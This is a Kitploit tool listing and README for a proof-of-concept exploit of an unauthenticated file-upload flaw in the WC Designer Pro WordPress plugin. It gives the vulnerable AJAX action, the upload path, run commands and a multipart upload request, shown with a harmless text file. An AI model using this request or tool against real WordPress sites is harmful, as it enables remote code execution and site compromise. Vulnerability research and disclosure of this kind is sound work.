Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-6440-Poc-Exploit — Unauthenticated remote code execution exploit for the WC Designer Pro WordPress plugin. Automates detection, file upload, and shell access via a vulnerable AJAX endpoint. | Kitploit
Tools/GitHubGitHub/m2hcz/cve-2025-6440-poc-exploit
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubm2hcz/cve-2025-6440-poc-exploit

CVE-2025-6440-Poc-Exploit

Unauthenticated remote code execution exploit for the WC Designer Pro WordPress plugin. Automates detection, file upload, and shell access via a vulnerable AJAX endpoint.

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
12152 months agoNot yet reviewed
Share

WC Designer Pro — Unauthenticated Arbitrary File Upload

Security Research Proof of Concept

Python WordPress Research

CWE Severity Authentication

A non-destructive proof of concept for an unauthenticated arbitrary file-upload vulnerability affecting the WC Designer Pro WordPress plugin.


Table of Contents

  • Vulnerability Overview
  • Security Impact
  • Affected Versions
  • Root Cause
  • Attack Flow
  • Requirements
  • Installation
  • Usage
  • Technical Details
  • Safe Verification
  • Indicators of Exposure
  • Remediation
  • Legal and Ethical Use
  • Disclosure Status
  • References
  • Credits

Vulnerability Overview

WC Designer Pro contains an unauthenticated arbitrary file-upload vulnerability in an AJAX action exposed through WordPress's admin-ajax.php endpoint.

The affected handler processes user-controlled file metadata and file contents without enforcing adequate authentication, authorization, extension validation, MIME-type validation, or server-side filename restrictions.

Under vulnerable configurations, an unauthenticated attacker may be able to upload a server-executable file into a web-accessible directory. Successful exploitation may result in remote code execution under the privileges of the web server process.

PropertyValue
ProductWC Designer Pro
PlatformWordPress
Vulnerability classUnrestricted arbitrary file upload
CWECWE-434
Authentication requiredNo
User interaction requiredNo
Potential impactRemote code execution
Attack complexityLow
Vulnerable componentWordPress AJAX upload handler
AJAX actionwcdp_save_canvas_design_ajax

The exact affected version range, CVE identifier, and CVSS score must only be published after they have been independently verified.


Security Impact

Successful exploitation could allow an unauthenticated attacker to:

  • Upload unauthorized files to the WordPress installation.
  • Store files inside a publicly accessible uploads directory.
  • Execute server-side code when executable extensions are accepted.
  • Read or modify data accessible to the web server account.
  • Compromise the affected WordPress installation.
  • Use the compromised server as a pivot point for further attacks.

The final impact depends on the web server configuration, PHP execution rules, filesystem permissions, and security controls deployed by the hosting provider.


Affected Versions

The affected version range is currently being validated.

Product: WC Designer Pro
Affected versions: To be confirmed
Fixed version: To be confirmed
Patch status: To be confirmed

Do not state that every version is affected unless testing or vendor confirmation supports that conclusion.


Root Cause

The vulnerable upload flow appears to trust attacker-controlled values supplied to the following AJAX action:

wcdp_save_canvas_design_ajax

The request contains file metadata such as:

  • File extension
  • File identifier
  • Destination identifier
  • Uploaded file contents

The vulnerability exists when the server accepts these values without performing all of the following controls:

  1. Authentication and authorization checks.
  2. WordPress nonce validation.
  3. Strict extension allowlisting.
  4. MIME-type validation based on file content.
  5. Filename normalization and sanitization.
  6. Enforcement of a non-executable upload destination.
  7. Prevention of direct web access to temporary files.

Attack Flow

Unauthenticated request
          │
          ▼
/wp-admin/admin-ajax.php
          │
          ▼
action=wcdp_save_canvas_design_ajax
          │
          ▼
Insufficient validation of uploaded file
          │
          ▼
File written to a web-accessible directory
          │
          ▼
Potential server-side code execution

The observed upload path follows this structure:

/wp-content/uploads/wcdp-uploads/temp/{identifier}/{filename}

The exact path may vary depending on plugin version, WordPress configuration, and server environment.


Requirements

  • Python 3.8 or newer
  • pip
  • A WordPress laboratory environment
  • An authorized target
  • A vulnerable WC Designer Pro installation

This proof of concept must not be used against third-party systems without explicit written authorization.


Installation

Clone the repository:

git clone https://github.com/m2hcz/wcdp-security-poc.git
cd wcdp-security-poc

Create and activate a virtual environment:

python3 -m venv .venv
source .venv/bin/activate

On Windows:

python -m venv .venv
.venv\Scripts\Activate.ps1

Install the dependencies:

pip install -r requirements.txt

Example requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

Usage

The proof of concept should be executed only against a single authorized laboratory target.

python3 exploit.py --url https://wordpress-lab.example

For a non-destructive verification:

python3 exploit.py \
  --url https://wordpress-lab.example \
  --file ./payloads/verification.txt

Example verification file:

WC Designer Pro security verification
Researcher: m2hcz
Purpose: Authorized non-destructive testing

Use the built-in help command to view the supported arguments:

python3 exploit.py --help

Example output:

usage: exploit.py [-h] --url URL [--file FILE] [--timeout SECONDS]

WC Designer Pro arbitrary file-upload verification PoC

options:
  -h, --help         show this help message and exit
  --url URL          authorized WordPress target
  --file FILE        harmless verification file
  --timeout SECONDS  HTTP request timeout

Technical Details

Vulnerable Endpoint

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wordpress-lab.example
Content-Type: multipart/form-data; boundary=----Boundary

The request invokes:

action=wcdp_save_canvas_design_ajax

A simplified request structure is shown below:

------Boundary
Content-Disposition: form-data; name="action"

wcdp_save_canvas_design_ajax
------Boundary
Content-Disposition: form-data; name="params"

{
  "mode": "save",
  "editor": "frontend",
  "uniq": "research-verification",
  "files": [
    {
      "name": "verification",
      "ext": "txt",
      "count": "file1"
    }
  ]
}
------Boundary
Content-Disposition: form-data; name="file1"; filename="verification.txt"
Content-Type: text/plain

Authorized security verification
------Boundary--

This example intentionally uses a non-executable text file.

Download Tool